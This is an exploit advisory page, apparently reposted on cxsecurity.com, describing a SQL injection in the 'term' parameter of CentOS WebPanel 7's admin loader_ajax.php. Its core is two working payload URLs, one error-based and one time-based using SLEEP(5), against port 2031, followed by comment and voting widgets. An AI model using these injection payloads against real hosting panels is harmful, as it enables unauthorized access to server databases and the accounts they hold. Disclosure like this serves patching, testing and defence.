CentOS WebPanel 7 SQL Injection

2020.03.14
Credit: Berke Yilmaz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Centos WebPanel 7 - 'term' SQL Injection # Google Dork: N/A # Date: 2020-03-03 # Exploit Author: Berke YILMAZ # Vendor Homepage: http://centos-webpanel.com/ # Software Link: http://centos-webpanel.com/ # Version: v6 - v7 # Tested on: Kali Linux - Windows 10 # CVE : N/A # Type: Error Based SQL Injection # Payload: https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a' AND (SELECT 1197 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,(SELECT (ELT(1197=1197,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aRuO # Type: Time Based SQL Injection # Payload: https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a' OR SLEEP(5)-- JCpP Centos-Webpanel (http://centos-webpanel.com/) CentOS Web Panel | Free Linux Web Hosting Control Panel Free CentOS Linux Web Hosting control panel designed for quick and easy management of (Dedicated & VPS) servers without of need to use ssh console for every little thing


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top